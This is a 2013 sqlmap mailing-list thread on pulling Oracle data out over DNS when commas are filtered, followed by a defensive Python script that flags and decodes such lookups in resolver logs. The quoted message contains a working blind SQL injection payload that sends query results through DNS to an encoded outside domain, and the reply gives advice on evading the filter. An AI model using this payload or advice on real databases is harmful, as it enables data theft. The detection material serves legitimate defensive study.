Re: [sqlmap-users] Oracle data retrieval over DNS
From: Miroslav S. <mir...@gm...> - 2013-07-21 21:41:09
Hi.

Well, both blind injection and DNS exfiltration require usage of the comma character - because there is a need for extracting bits/characters/chunks (SUBSTRC). Nonetheless, that method you referenced would require a noticeable amount of work to be done on the Oracle side.

I would suggest you try a manual DNS exfiltration approach without SUBSTRC (whole query response into the DNS request - and pray that it fits within the size limits).

Kind regards,
Miroslav Stampar

On Sun, Jul 21, 2013 at 3:43 PM, Marcell Fodor <fod...@gm...> wrote:
> Heya,
>
> Sqlmap identifies an Oracle blind injection point, but commas are filtered
> so I get no data even when using --dns-domain.
>
> Even with --dns-domain there are substrings (,) in query
> ---
> AND ASCII(SUBSTRC((SELECT
> UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
> RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
> DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
> FROM DUAL),8,1))>914 AND (7100=7100)
> ---
>
> Is there a way to do the technique described on this page with sqlmap?
>
> http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/
>
> M

--
Miroslav Stampar
http://about.me/stamparm
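For anyone reviewing resolver logs, the lookup built by the quoted payload has a recognisable shape: a short marker label, a hex label holding the data chunk, a second marker label, then the receiving domain. The following is an added example, not part of the thread and not sqlmap code; the log format, the domain `exfil.example`, the three-letter marker assumption and the function names are all constructed for illustration.

```python
import re

# Name shape produced by the quoted payload: <marker>.<hex chunk>.<marker>.<domain>
# CHR(71)||CHR(113)||CHR(80) is "GqP" and CHR(117)||CHR(81)||CHR(117) is "uQu".
# The chunk is RAWTOHEX of at most 31 characters (SUBSTRC(...,1,31)), so at most
# 62 hex digits, which keeps it under the 63-byte DNS label limit.
EXFIL_RE = re.compile(
    r"^([A-Za-z]{3})\.((?:[0-9A-Fa-f]{2}){1,31})\.([A-Za-z]{3})\.(.+)$")

def decode_exfil(qname):
    """Return (domain, decoded_text) when qname has the exfil shape, else None."""
    m = EXFIL_RE.match(qname.rstrip("."))
    if not m:
        return None
    raw = bytes.fromhex(m.group(2))
    # latin-1 never fails, so undecodable chunks are still shown to the analyst
    return m.group(4).lower(), raw.decode("latin-1")

def scan(log_lines):
    """Group decoded chunks per destination domain as (client, text) pairs."""
    hits = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # not a query record in the assumed format
        result = decode_exfil(fields[2])
        if result:
            hits.setdefault(result[0], []).append((fields[1], result[1]))
    return hits

# Constructed sample log (assumed format: timestamp client qname qtype).
# 33313830 is RAWTOHEX('3180'), the value cast in the quoted payload.
SAMPLE_LOG = [
    "2013-07-21T13:40:02Z 10.0.0.5 GqP.33313830.uQu.exfil.example A",
    "2013-07-21T13:40:03Z 10.0.0.5 www.example.com A",
    "2013-07-21T13:40:04Z 10.0.0.5 aBc.535953.xYz.exfil.example A",
    "2013-07-21T13:40:05Z 10.0.0.7 mail.corp.example.com A",
]

if __name__ == "__main__":
    for domain, chunks in scan(SAMPLE_LOG).items():
        print(domain, chunks)
```

The pattern is a triage heuristic: an ordinary name whose second label happens to be valid hex would also match, so confirm a hit by the volume of lookups to the same domain and by whether the clients are database hosts, which rarely need to resolve external names.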